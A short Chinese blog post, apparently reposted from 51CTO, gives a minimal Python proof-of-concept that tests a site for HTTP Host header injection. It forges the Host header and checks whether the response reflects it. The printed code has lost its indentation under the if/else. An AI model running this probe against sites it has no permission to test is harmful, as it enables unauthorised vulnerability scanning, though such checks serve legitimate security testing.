简单版http host头攻击漏洞POC,没有对异常进行处理,没有对意外情况进行处理,所以是简单版!代码如下:
from urllib import request
import sys
import re
url=sys.argv[1]
header={'Host' : 'www.eth10.com'}
req=request.Request(url,headers=header)
u = request.urlopen(req)
resp = u.read()
if re.match('.*www.eth10.com',str(resp)):
print('漏洞存在')
else:
print('不存在该漏洞') 使用语法:python3 host.py URL,URL格式为:http://xx.xx.xx
本文转自 eth10 51CTO博客,原文链接:http://blog.51cto.com/eth10/2052582
